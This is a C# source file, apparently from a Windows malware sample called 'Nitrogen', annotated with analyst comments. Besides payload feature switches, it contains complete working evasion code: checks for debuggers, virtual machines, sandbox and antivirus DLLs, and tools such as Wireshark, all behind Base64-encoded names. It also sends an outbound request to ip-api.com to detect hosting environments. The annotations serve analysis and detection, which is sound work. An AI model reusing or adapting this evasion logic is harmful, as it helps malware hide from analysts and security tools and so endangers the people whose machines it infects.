using System;
using System.Diagnostics;
using System.Linq;
using System.Management;
using System.Net;
using System.Reflection;
using System.Text;
using System.Threading;
using static Nitrogen.Dll_Imports;
namespace Nitrogen
{
/// <summary>
/// Static configuration flags plus the sample's single-instance check and its
/// environment / anti-analysis checks.
/// </summary>
/// <remarks>
/// Analyst notes. The module names, process names and URL used by the checks are
/// stored Base64-encoded and decoded at call time; the decoded value is written next
/// to each literal below. This class only reports results: whatever acts on
/// <see cref="AlreadyRunning"/> and <see cref="IsAnalyzed"/> is not visible in this file.
/// The native calls come from <c>Nitrogen.Dll_Imports</c>, which is also not shown here.
/// </remarks>
internal class variables
{
    // Boolean switches; by their names they presumably enable or disable individual
    // payload features elsewhere in the project. Nothing in this file reads them.
    public static bool gdi_payloads = true;
    public static bool window_shake = false;
    public static bool textchanger = true;
    //public static bool drawcursor = false;
    public static bool mouse = false;
    public static bool keyboard = false;
    public static bool iconmove = false;
    public static bool sounds = true;

    public static bool extreme = false;

    /// <summary>
    /// Reports whether another process is running from the same executable image.
    /// </summary>
    /// <returns>
    /// <c>true</c> if any process other than the current one has a first module whose
    /// file name equals the executing assembly's location; otherwise <c>false</c>.
    /// </returns>
    public static bool AlreadyRunning()
    {
        Process[] processes = Process.GetProcesses();
        Process currentProcess = Process.GetCurrentProcess();
        foreach (Process process in processes)
        {
            try
            {
                // Modules[0] is the process's first listed module; the comparison is an
                // exact, case-sensitive string match on the full path.
                if (process.Modules[0].FileName == Assembly.GetExecutingAssembly().Location && currentProcess.Id != process.Id)
                {
                    return true;
                }
            }
            catch
            {
                // Any failure reading a process's module list is ignored and the
                // loop moves on to the next process.
            }
        }
        return false;
    }

    /// <summary>
    /// Asks the OS whether a debugger is attached to the current process.
    /// </summary>
    /// <returns>
    /// The flag written by <c>CheckRemoteDebuggerPresent</c>, or <c>false</c> if the
    /// call throws.
    /// </returns>
    private static bool IsDebuggerAttached()
    {
        bool flag = false;
        bool result;
        try
        {
            // Imported through `using static Nitrogen.Dll_Imports`; the declaration is
            // not in this file. The API's own return value is not inspected, only `flag`.
            CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref flag);
            result = flag;
        }
        catch
        {
            result = false;
        }
        return result;
    }

    /// <summary>
    /// Fingerprints the host through two WMI queries to decide whether it looks like a
    /// virtual machine.
    /// </summary>
    /// <returns>
    /// <c>true</c> when a manufacturer/model or video-controller condition matches, or
    /// when the first query throws; otherwise <c>false</c>.
    /// </returns>
    /// <remarks>
    /// Detection note: WMI reads of Win32_ComputerSystem and Win32_VideoController from
    /// a process that has no management role are a commonly used fingerprinting signal.
    /// </remarks>
    private static bool IsVirtualMachine()
    {
        using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
        {
            try
            {
                using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
                {
                    foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
                    {
                        // Three alternatives: Manufacturer is exactly "microsoft corporation"
                        // with a Model containing "VIRTUAL" (both case-folded); Manufacturer
                        // contains "vmware" (case-folded); or Model is exactly "VirtualBox"
                        // (case-sensitive).
                        if ((managementBaseObject["Manufacturer"].ToString().ToLower() == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || managementBaseObject["Manufacturer"].ToString().ToLower().Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox")
                        {
                            return true;
                        }
                    }
                }
            }
            catch
            {
                // Any exception in the query or the property reads above is reported
                // as "virtual machine".
                return true;
            }
        }
        // Second query runs outside the try block, so an exception here propagates to
        // the caller. The searcher and its result collection are not disposed.
        foreach (ManagementBaseObject managementBaseObject2 in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController").Get())
        {
            // As written, the adapter name must contain both "VMware" and "VBox".
            if (managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VMware") && managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VBox"))
            {
                return true;
            }
        }
        return false;
    }

    /// <summary>
    /// Timing check: compares the wall clock before and after a 10 ms sleep.
    /// </summary>
    /// <returns>
    /// <c>true</c> if fewer than 10 ticks elapsed across the sleep; otherwise
    /// <c>false</c>, including when an exception is thrown.
    /// </returns>
    private static bool IsEmulated()
    {
        try
        {
            long ticks = DateTime.Now.Ticks;
            Thread.Sleep(10);
            // A tick is 100 ns, so the threshold is 1 microsecond rather than 10 ms: the
            // branch is taken only if the clock barely advanced during the sleep.
            if (DateTime.Now.Ticks - ticks < 10L)
            {
                return true;
            }
        }
        catch
        {
        }
        return false;
    }

    /// <summary>
    /// Checks whether any of five named DLLs is loaded in the current process.
    /// </summary>
    /// <returns>
    /// <c>true</c> if <c>GetModuleHandle</c> gives a non-zero value for any of the names;
    /// otherwise <c>false</c>.
    /// </returns>
    /// <remarks>
    /// The product attributions in the comments below are the commonly cited ones and
    /// are not established by this file.
    /// </remarks>
    private static bool IsSandBoxie()
    {
        string[] array = new string[]
        {
            // "SbieDll.dll" (commonly associated with Sandboxie)
            Encoding.UTF8.GetString(Convert.FromBase64String("U2JpZURsbC5kbGw=")),
            // "SxIn.dll" (commonly associated with a Qihoo 360 sandbox)
            Encoding.UTF8.GetString(Convert.FromBase64String("U3hJbi5kbGw=")),
            // "Sf2.dll" (commonly associated with Avast)
            Encoding.UTF8.GetString(Convert.FromBase64String("U2YyLmRsbA==")),
            // "snxhk.dll" (commonly associated with Avast)
            Encoding.UTF8.GetString(Convert.FromBase64String("c254aGsuZGxs")),
            // "cmdvrt32.dll" (commonly associated with Comodo)
            Encoding.UTF8.GetString(Convert.FromBase64String("Y21kdnJ0MzIuZGxs"))
        };
        for (int i = 0; i < array.Length; i++)
        {
            // GetModuleHandle is imported from Dll_Imports (declaration not shown).
            if (GetModuleHandle(array[i]).ToInt32() != 0)
            {
                return true;
            }
        }
        return false;
    }

    /// <summary>
    /// Checks the running process list for a fixed set of monitoring-tool names.
    /// </summary>
    /// <returns>
    /// <c>true</c> if any process name, lower-cased, exactly equals one of the decoded
    /// names; otherwise <c>false</c>.
    /// </returns>
    private static bool IsBlacklistedProcessesRunning()
    {
        Process[] processes = Process.GetProcesses();
        string[] source = new string[]
        {
            // "processhacker"
            Encoding.UTF8.GetString(Convert.FromBase64String("cHJvY2Vzc2hhY2tlcg==")),
            // "netstat"
            Encoding.UTF8.GetString(Convert.FromBase64String("bmV0c3RhdA==")),
            // "netmon"
            Encoding.UTF8.GetString(Convert.FromBase64String("bmV0bW9u")),
            // "tcpview"
            Encoding.UTF8.GetString(Convert.FromBase64String("dGNwdmlldw==")),
            // "wireshark"
            Encoding.UTF8.GetString(Convert.FromBase64String("d2lyZXNoYXJr")),
            // "filemon"
            Encoding.UTF8.GetString(Convert.FromBase64String("ZmlsZW1vbg==")),
            // "regmon"
            Encoding.UTF8.GetString(Convert.FromBase64String("cmVnbW9u")),
            // "cain"
            Encoding.UTF8.GetString(Convert.FromBase64String("Y2Fpbg=="))
        };
        foreach (Process process in processes)
        {
            // Whole-name equality via Enumerable.Contains; a tool running under a
            // different process name is not matched by this comparison.
            if (source.Contains(process.ProcessName.ToLower()))
            {
                return true;
            }
        }
        return false;
    }

    /// <summary>
    /// Queries an external IP-information service and looks for "true" in the reply.
    /// </summary>
    /// <returns>
    /// <c>true</c> if the response body contains the substring "true"; <c>false</c> if
    /// it does not or if the request throws.
    /// </returns>
    /// <remarks>
    /// Network indicator: the decoded URL is
    /// <c>http://ip-api.com/line/?fields=hosting</c>, fetched over plain HTTP with
    /// <c>WebClient</c>. The <c>WebClient</c> instance is not disposed.
    /// </remarks>
    private static bool IsHosted()
    {
        try
        {
            return new WebClient().DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovL2lwLWFwaS5jb20vbGluZS8/ZmllbGRzPWhvc3Rpbmc="))).Contains("true");
        }
        catch
        {
            // Request failures (no network, blocked host, HTTP error) fall through to
            // the `return false` below.
        }
        return false;
    }

    /// <summary>
    /// Combines all environment checks into a single verdict.
    /// </summary>
    /// <returns>
    /// <c>true</c> as soon as any check returns <c>true</c>; <c>false</c> if all six
    /// return <c>false</c>.
    /// </returns>
    /// <remarks>
    /// Evaluation is short-circuit and left to right, so the outbound HTTP request in
    /// <see cref="IsHosted"/> is issued first on every call, before any local check.
    /// </remarks>
    public static bool IsAnalyzed()
    {
        return IsHosted() || IsSandBoxie() || IsVirtualMachine() ||IsDebuggerAttached() || IsEmulated() || IsBlacklistedProcessesRunning();
    }
}
}